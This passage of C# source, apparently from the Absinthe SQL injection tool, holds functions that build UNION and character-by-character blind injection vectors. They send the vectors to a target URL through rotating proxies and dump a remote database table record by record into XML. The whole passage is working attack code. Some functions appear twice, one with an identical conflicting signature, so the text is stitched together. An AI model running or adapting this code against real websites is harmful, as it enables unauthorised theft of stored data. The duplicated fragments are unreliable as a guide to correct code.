// }}}
// {{{ SelectValueForGivenPrimaryKey
/// <summary>
/// Builds the statement text "SELECT TOP 1 FieldName FROM TableName WHERE pk.Name=pk.Value".
/// </summary>
/// <param name="FieldName">Column to project; concatenated verbatim.</param>
/// <param name="TableName">Table to select from; concatenated verbatim.</param>
/// <param name="pk">Key whose Name and Value form the WHERE clause; neither is quoted or escaped here.</param>
/// <returns>The assembled statement text.</returns>
public string SelectValueForGivenPrimaryKey(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
    string projection = "SELECT TOP 1 " + FieldName + " FROM " + TableName;
    string filter = " WHERE " + pk.Name + "=" + pk.Value;
    return projection + filter;
}
/// <summary>
/// Fetches the smallest value of <paramref name="KeyName"/> in <paramref name="TableName"/> that is greater
/// than the key passed in, using one page request whose vector parameter carries a union select of
/// "min(KeyName)" wrapped in char(58) delimiters.
/// </summary>
/// <param name="TableName">Table the key column belongs to.</param>
/// <param name="KeyName">Primary key column name.</param>
/// <param name="CurrentPrimaryKey">Key from the previous call; its Value is used as the lower bound only when
/// its Name equals <paramref name="KeyName"/> (presumably a fresh PrimaryKey has no Name and so yields no WHERE clause — confirm).</param>
/// <param name="PrimaryKeyType">Column type; for character types the returned Value is rewritten as a
/// "char(n) + char(n) ..." concatenation, for every other type it is the trimmed text.</param>
/// <returns>PrimaryKey with Name = KeyName, Value = the statement-ready form and OutputValue = the delimiter-stripped text.</returns>
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
    StringBuilder WhereClause = new StringBuilder();
    // Continue from the previous value only when the incoming key is for this same column.
    if (CurrentPrimaryKey.Name == KeyName)
    {
        WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
    }
    // The vector parameter is overwritten with the generated select, then the page is requested
    // with the proxy returned by RotatedProxy() and the configured POST flag, cookies, credentials and user agent.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    // Drop the leading and trailing ':' delimiters (char(58)) added by the select above.
    // NOTE(review): no length guard — a parse result shorter than two characters makes this throw ArgumentOutOfRangeException.
    ResultText = ResultText.Substring(1, ResultText.Length - 2);
    string WorkingText = "";
    switch (PrimaryKeyType)
    {
        case SqlDbType.VarChar:
        case SqlDbType.Char:
        case SqlDbType.NChar:
        case SqlDbType.NText:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
            StringBuilder ElementBuilder = new StringBuilder();
            // Rebuild the text one character at a time as "char(<Char.GetNumericValue(c)>) + ...".
            char[] TextElements = ResultText.ToCharArray();
            for (int i = 0; i < TextElements.Length; i++)
            {
                ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
            }
            // Remove the trailing "+ " left by the last iteration.
            // NOTE(review): throws for an empty ResultText, since nothing was appended.
            ElementBuilder.Remove(ElementBuilder.Length - 2, 2);
            WorkingText = ElementBuilder.ToString();
            break;
        default:
            WorkingText = ResultText.Trim();
            break;
    }
    GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
    retVal.Name = KeyName;
    retVal.Value = WorkingText;
    retVal.OutputValue = ResultText;
    return(retVal);
}
// }}}
// {{{ GetRecord
/// <summary>
/// Fetches every column in <paramref name="Columns"/> for the row identified by <paramref name="pk"/>,
/// one GetFieldData call per column.
/// </summary>
/// <param name="TableName">Table to read from.</param>
/// <param name="Columns">Columns to fetch, in the order they are requested.</param>
/// <param name="pk">Primary key of the row.</param>
/// <returns>Hashtable mapping each entry's Key to its Value as returned by GetFieldData.
/// Hashtable.Add throws if two columns yield the same key.</returns>
private Hashtable GetRecord(string TableName, GlobalDS.Field[] Columns, GlobalDS.PrimaryKey pk)
{
    Hashtable record = new Hashtable();
    foreach (GlobalDS.Field column in Columns)
    {
        DictionaryEntry entry = GetFieldData(TableName, column, pk);
        record.Add(entry.Key, entry.Value);
    }
    return record;
}
// }}}
// {{{ PullDataFromIndividualTable
/// <summary>
/// Walks <paramref name="SrcTable"/> one record at a time: selects the fields whose indices appear in
/// <paramref name="ColumnIDs"/>, locates the field flagged IsPrimary, then for SrcTable.RecordCount
/// iterations advances the key with IteratePrimaryKey, fetches the selected fields with GetRecord and
/// writes the record to <paramref name="xOutput"/> via OutputRecordToFile.
/// </summary>
/// <param name="SrcTable">Table description: Name, FieldList (FieldName, IsPrimary, DataType) and RecordCount.</param>
/// <param name="ColumnIDs">Indices into SrcTable.FieldList of the columns to pull.</param>
/// <param name="xOutput">Writer each record is appended to.</param>
/// <returns>All fetched records, one Hashtable per row; empty when no field is flagged IsPrimary.</returns>
private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
    List<Hashtable> retVal = new List<Hashtable>();
    long RecordCounter = 0;
    // Sized by the request, filled only for indices that match a field below.
    // NOTE(review): an index in ColumnIDs with no matching field leaves a null slot that GetRecord would dereference — confirm callers validate ColumnIDs.
    GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
    GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
    int ColumnCounter = 0;
    string PrimaryKeyName = String.Empty;
    SqlDbType PrimaryKeyType = SqlDbType.Int;
    UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
    // Generate Field List
    for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
    {
        UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
        if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
        {
            ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
            ColumnCounter++;
        }
        // No break: if several fields are flagged IsPrimary, the last one wins.
        if (SrcTable.FieldList[FieldCounter].IsPrimary)
        {
            PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
            PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
        }
    }
    // Without a primary key there is no way to step through rows, so nothing is fetched.
    if (PrimaryKeyName.Length > 0)
    {
        for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
        {
            // Each iteration feeds the previous key back in to get the next one.
            CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
            Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
            retVal.Add(Record);
            OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
        }
    }
    return(retVal);
}
// }}}
// {{{ SelectCharacterValueForConvertedRecordValue
/// <summary>
/// Builds "SELECT ASCII(SUBSTRING(CONVERT(VarChar,FieldName),Index,1)) FROM TableName WHERE pk.Name = pk.Value",
/// the character code at position <paramref name="Index"/> of the field's VarChar form.
/// </summary>
/// <param name="Index">Position passed to SUBSTRING; rendered with the default long formatting.</param>
/// <param name="FieldName">Column to convert; concatenated verbatim.</param>
/// <param name="TableName">Table to select from; concatenated verbatim.</param>
/// <param name="pk">Key whose Name and Value form the WHERE clause; neither is quoted or escaped here.</param>
/// <returns>The assembled statement text.</returns>
public string SelectCharacterValueForConvertedRecordValue(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
    string projection = "SELECT ASCII(SUBSTRING(CONVERT(VarChar," + FieldName + ")," + Index + ",1))";
    string source = " FROM " + TableName;
    string filter = " WHERE " + pk.Name + " = " + pk.Value;
    return projection + source + filter;
}
// }}}
// {{{ SelectLengthOfConvertedRecordValue
/// <summary>
/// Builds "SELECT TOP 1 LENGTH(CONVERT(VarChar,FieldName)) FROM TableName WHERE pk.Name=pk.Value",
/// the length of the field's VarChar form for the keyed row.
/// </summary>
/// <param name="FieldName">Column to convert; concatenated verbatim.</param>
/// <param name="TableName">Table to select from; concatenated verbatim.</param>
/// <param name="pk">Key whose Name and Value form the WHERE clause; neither is quoted or escaped here.</param>
/// <returns>The assembled statement text.</returns>
public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
    string projection = "SELECT TOP 1 LENGTH(CONVERT(VarChar," + FieldName + "))";
    string source = " FROM " + TableName;
    string filter = " WHERE " + pk.Name + "=" + pk.Value;
    return projection + source + filter;
}
// }}}
// {{{ SelectCharacterValueForGivenPrimaryKey
/// <summary>
/// Builds "SELECT ASCII(SUBSTR(FieldName,Index,1)) FROM TableName WHERE pk.Name=pk.Value",
/// the character code at position <paramref name="Index"/> of the field.
/// </summary>
/// <param name="Index">Position passed to SUBSTR; rendered with the default long formatting.</param>
/// <param name="FieldName">Column to read; concatenated verbatim.</param>
/// <param name="TableName">Table to select from; concatenated verbatim.</param>
/// <param name="pk">Key whose Name and Value form the WHERE clause; neither is quoted or escaped here.</param>
/// <returns>The assembled statement text.</returns>
public string SelectCharacterValueForGivenPrimaryKey(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
    string projection = "SELECT ASCII(SUBSTR(" + FieldName + "," + Index + ",1))";
    string source = " FROM " + TableName;
    string filter = " WHERE " + pk.Name + "=" + pk.Value;
    return projection + source + filter;
}
// }}}
// {{{ SelectLengthOfConvertedRecordValue
/// <summary>
/// Builds "SELECT LENGTH(TO_CHAR(FieldName)) FROM TableName WHERE ROWNUM=1 AND pk.Name=pk.Value",
/// the length of the field's TO_CHAR form for the keyed row, limited to one row via ROWNUM.
/// </summary>
/// <param name="FieldName">Column to convert; concatenated verbatim.</param>
/// <param name="TableName">Table to select from; concatenated verbatim.</param>
/// <param name="pk">Key whose Name and Value form the WHERE clause; neither is quoted or escaped here.</param>
/// <returns>The assembled statement text.</returns>
public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
    string projection = "SELECT LENGTH(TO_CHAR(" + FieldName + "))";
    string source = " FROM " + TableName;
    string filter = " WHERE ROWNUM=1 AND " + pk.Name + "=" + pk.Value;
    return projection + source + filter;
}
// }}}
// {{{ GetFieldData
/// <summary>
/// Fetches one column of the row identified by <paramref name="pk"/> with a single page request and
/// returns it as a (FieldName, text) entry. When the requested column is the key column itself the
/// key's Value is returned without any request.
/// </summary>
/// <param name="TableName">Table to select from.</param>
/// <param name="Column">Column description; FieldName and DataType are read.</param>
/// <param name="pk">Primary key of the row; Name and Value are spliced verbatim into the WHERE clause.</param>
/// <returns>DictionaryEntry with Key = Column.FieldName and Value = the delimiter-stripped result text.</returns>
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
    DictionaryEntry retVal = new DictionaryEntry();
    retVal.Key = Column.FieldName;
    retVal.Value = string.Empty;
    // The key column's value is already known from the caller.
    if (Column.FieldName.Equals(pk.Name))
    {
        retVal.Value = pk.Value;
        return(retVal);
    }
    StringBuilder SelectClause = new StringBuilder();
    // Every handled type currently produces the same nvarchar conversion wrapped in char(58)
    // delimiters; the commented-out calls are the earlier per-type retrieval paths.
    switch (Column.DataType)
    {
        case SqlDbType.BigInt:
        case SqlDbType.SmallInt:
        case SqlDbType.TinyInt:
        case SqlDbType.Int:
        case SqlDbType.Decimal:
        case SqlDbType.DateTime:
        case SqlDbType.Money:
        case SqlDbType.Float:
        case SqlDbType.Real:
        case SqlDbType.SmallDateTime:
        case SqlDbType.SmallMoney:
        case SqlDbType.Timestamp:
        case SqlDbType.UniqueIdentifier:
            //retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
            SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
            break;
        case SqlDbType.NChar:
        case SqlDbType.Char:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
        case SqlDbType.NText:
        case SqlDbType.VarChar:
            //retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
            SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
            break;
        case SqlDbType.Bit:
            //retVal.Value = GetBitField(Column.FieldName, TableName, pk);
            SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
            break;
        case SqlDbType.Image:
        case SqlDbType.Binary:
        case SqlDbType.VarBinary:
            // TODO: Figure out how to support this!
            // NOTE(review): SelectClause stays empty here, yet the request below is still issued with that empty selection — confirm this is intended.
            //retVal.Value = null;
            break;
    }
    // The vector parameter is overwritten with the generated select, then the page is requested
    // with the proxy returned by RotatedProxy() and the configured POST flag, cookies, credentials and user agent.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
    // Drop the leading and trailing ':' delimiters (char(58)) added by the select above.
    // NOTE(review): throws ArgumentOutOfRangeException when the parsed text is shorter than two characters.
    retVal.Value = ResultText.Substring(1, ResultText.Length - 2);
    return(retVal);
}
/// <summary>
/// Writes one record as a DataRecord element carrying PrimaryKey / PrimaryKeyValue attributes, with one
/// child element per Hashtable key named after that key and containing the value's ToString().
/// </summary>
/// <param name="xOutput">Writer to append to.</param>
/// <param name="DataRecord">Column name to value map for the row.</param>
/// <param name="pk">Key of the row; its OutputValue (the plain text form) is written, not its Value.</param>
private void OutputRecordToFile(ref XmlTextWriter xOutput, Hashtable DataRecord, GlobalDS.PrimaryKey pk)
{
    xOutput.WriteStartElement("DataRecord");
    xOutput.WriteAttributeString("PrimaryKey", pk.Name);
    xOutput.WriteAttributeString("PrimaryKeyValue", pk.OutputValue);
    foreach (string columnName in DataRecord.Keys)
    {
        // NOTE(review): the column name is used directly as the element name and the value is not
        // null-checked before ToString() — confirm both always hold for the records passed in.
        xOutput.WriteElementString(columnName, DataRecord[columnName].ToString());
    }
    xOutput.WriteEndElement();
}
/// <summary>
/// Fetches the smallest value of <paramref name="KeyName"/> in <paramref name="TableName"/> that is greater
/// than the key passed in, using one page request whose vector parameter carries a union select of
/// "min(KeyName)" wrapped in char(58) delimiters.
/// </summary>
/// <param name="TableName">Table the key column belongs to.</param>
/// <param name="KeyName">Primary key column name.</param>
/// <param name="CurrentPrimaryKey">Key from the previous call; its Value is used as the lower bound only when
/// its Name equals <paramref name="KeyName"/> (presumably a fresh PrimaryKey has no Name and so yields no WHERE clause — confirm).</param>
/// <param name="PrimaryKeyType">Column type; for character types the returned Value is rewritten as a
/// "char(n) + char(n) ..." concatenation, for every other type it is the trimmed text.</param>
/// <returns>PrimaryKey with Name = KeyName, Value = the statement-ready form and OutputValue = the delimiter-stripped text.</returns>
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
    StringBuilder WhereClause = new StringBuilder();
    // Continue from the previous value only when the incoming key is for this same column.
    if (CurrentPrimaryKey.Name == KeyName)
    {
        WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
    }
    // The vector parameter is overwritten with the generated select, then the page is requested
    // with the proxy returned by RotatedProxy() and the configured POST flag, cookies, credentials and user agent.
    _AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
    string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
    string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
    // Drop the leading and trailing ':' delimiters (char(58)) added by the select above.
    // NOTE(review): no length guard — a parse result shorter than two characters makes this throw ArgumentOutOfRangeException.
    ResultText = ResultText.Substring(1, ResultText.Length-2);
    string WorkingText = "";
    switch(PrimaryKeyType)
    {
        case SqlDbType.VarChar:
        case SqlDbType.Char:
        case SqlDbType.NChar:
        case SqlDbType.NText:
        case SqlDbType.NVarChar:
        case SqlDbType.Text:
            StringBuilder ElementBuilder = new StringBuilder();
            // Rebuild the text one character at a time as "char(<Char.GetNumericValue(c)>) + ...".
            char[] TextElements = ResultText.ToCharArray();
            for (int i=0; i < TextElements.Length; i++)
            {
                ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
            }
            // Remove the trailing "+ " left by the last iteration.
            // NOTE(review): throws for an empty ResultText, since nothing was appended.
            ElementBuilder.Remove(ElementBuilder.Length -2,2);
            WorkingText = ElementBuilder.ToString();
            break;
        default:
            WorkingText = ResultText.Trim();
            break;
    }
    GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
    retVal.Name = KeyName;
    retVal.Value = WorkingText;
    retVal.OutputValue = ResultText;
    return retVal;
}
// }}}
// {{{ PullDataFromIndividualTable
/// <summary>
/// Walks <paramref name="SrcTable"/> one record at a time: selects the fields whose indices appear in
/// <paramref name="ColumnIDs"/>, locates the field flagged IsPrimary, then for SrcTable.RecordCount
/// iterations advances the key with IteratePrimaryKey, fetches the selected fields with GetRecord and
/// writes the record to <paramref name="xOutput"/> via OutputRecordToFile.
/// </summary>
/// <param name="SrcTable">Table description: Name, FieldList (FieldName, IsPrimary, DataType) and RecordCount.</param>
/// <param name="ColumnIDs">Indices into SrcTable.FieldList of the columns to pull.</param>
/// <param name="xOutput">Writer each record is appended to.</param>
/// <returns>All fetched records, one Hashtable per row; empty when no field is flagged IsPrimary.</returns>
private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
    List<Hashtable> retVal = new List<Hashtable>();
    long RecordCounter = 0;
    // Sized by the request, filled only for indices that match a field below.
    // NOTE(review): an index in ColumnIDs with no matching field leaves a null slot that GetRecord would dereference — confirm callers validate ColumnIDs.
    GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
    GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
    int ColumnCounter = 0;
    string PrimaryKeyName = String.Empty;
    SqlDbType PrimaryKeyType= SqlDbType.Int;
    UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
    // Generate Field List
    for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
    {
        UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
        if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
        {
            ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
            ColumnCounter++;
        }
        // No break: if several fields are flagged IsPrimary, the last one wins.
        if (SrcTable.FieldList[FieldCounter].IsPrimary)
        {
            PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
            PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
        }
    }
    // Without a primary key there is no way to step through rows, so nothing is fetched.
    if (PrimaryKeyName.Length > 0)
    {
        for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
        {
            // Each iteration feeds the previous key back in to get the next one.
            CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
            Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
            retVal.Add(Record);
            OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
        }
    }
    return retVal;
}
// }}}
// {{{ IterateIntegerPrimaryKey
/// <summary>
/// Resolves the next integer value of the key column <paramref name="KeyName"/> in <paramref name="TableName"/>
/// with a RecursiveSearch over a vector made of _VectorBuffer plus the plugin's "and greater than" wrapper.
/// The previous key's Value is used as the lower bound only when its Name equals <paramref name="KeyName"/>.
/// </summary>
/// <param name="TableName">Table the key column belongs to.</param>
/// <param name="KeyName">Primary key column name.</param>
/// <param name="CurrentPrimaryKey">Key from the previous call.</param>
/// <returns>PrimaryKey with Name = KeyName and both Value and OutputValue set to the found number's text.</returns>
private GlobalDS.PrimaryKey IterateIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
{
    bool continuesSameColumn = CurrentPrimaryKey.Name == KeyName;
    StringBuilder vector = new StringBuilder();
    vector.Append(_VectorBuffer);
    vector.Append(_PluginData.AndGreaterThanWrapper(continuesSameColumn
        ? _PluginData.IntegerPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)
        : _PluginData.IntegerPrimaryKeyValue(KeyName, TableName)));
    // Is there a way to force this to be numeric?!
    long found = RecursiveSearch(1, 0, vector.ToString());
    string foundText = found.ToString();
    GlobalDS.PrimaryKey next = new GlobalDS.PrimaryKey();
    next.Name = KeyName;
    next.Value = foundText;
    next.OutputValue = foundText;
    return next;
}
// }}}
// {{{ IterateNonIntegerPrimaryKey
/// <summary>
/// Resolves the next non-integer value of the key column <paramref name="KeyName"/> in <paramref name="TableName"/>
/// character by character: one RecursiveSearch yields the length of the key's converted text, then one
/// RecursiveSearch per position yields that character's code. The previous key's Value is used as the
/// lower bound only when its Name equals <paramref name="KeyName"/>.
/// </summary>
/// <param name="TableName">Table the key column belongs to.</param>
/// <param name="KeyName">Primary key column name.</param>
/// <param name="CurrentPrimaryKey">Key from the previous call.</param>
/// <returns>PrimaryKey with Name = KeyName, Value = the characters rendered through the plugin's
/// CharConversionFunction and joined by ConcatenationCharacter, OutputValue = the plain characters.</returns>
private GlobalDS.PrimaryKey IterateNonIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
{
    StringBuilder CurrentVector = new StringBuilder();
    CurrentVector.Append(_VectorBuffer);
    if (CurrentPrimaryKey.Name == KeyName)
    {
        CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
    }
    else
    {
        CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName)));
    }
    // Length of the key text; bounds the per-character loop below.
    long Size = RecursiveSearch(1,0,CurrentVector.ToString());
    StringBuilder KeyValueBuilder = new StringBuilder();
    StringBuilder KeyOutputValueBuilder = new StringBuilder();
    for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
    {
        // A fresh vector per position, with the same lower-bound rule as above.
        CurrentVector = new StringBuilder();
        CurrentVector.Append(_VectorBuffer);
        if (CurrentPrimaryKey.Name == KeyName)
        {
            CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName, CurrentPrimaryKey.Value)));
        }
        else
        {
            CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName)));
        }
        // Character code at this position; 1 and UNICODE_LIMIT are presumably the search bounds — confirm against RecursiveSearch.
        long SearchVal = RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString());
        KeyValueBuilder.Append(_PluginData.CharConversionFunction(SearchVal)).Append(_PluginData.ConcatenationCharacter);
        // NOTE(review): Convert.ToChar(long) throws OverflowException above 0xFFFF; this relies on UNICODE_LIMIT keeping SearchVal in range.
        KeyOutputValueBuilder.Append(Convert.ToChar(SearchVal));
    }
    // Drop the trailing separator appended by the last iteration.
    // NOTE(review): when Size is 0 nothing was appended and this Remove throws ArgumentOutOfRangeException.
    KeyValueBuilder.Remove(KeyValueBuilder.Length - _PluginData.ConcatenationCharacter.Length, _PluginData.ConcatenationCharacter.Length);
    GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
    retVal.Name = KeyName;
    //TODO: We should escape this with apostrophes most likely
    retVal.Value = KeyValueBuilder.ToString();
    retVal.OutputValue = KeyOutputValueBuilder.ToString();
    return retVal;
}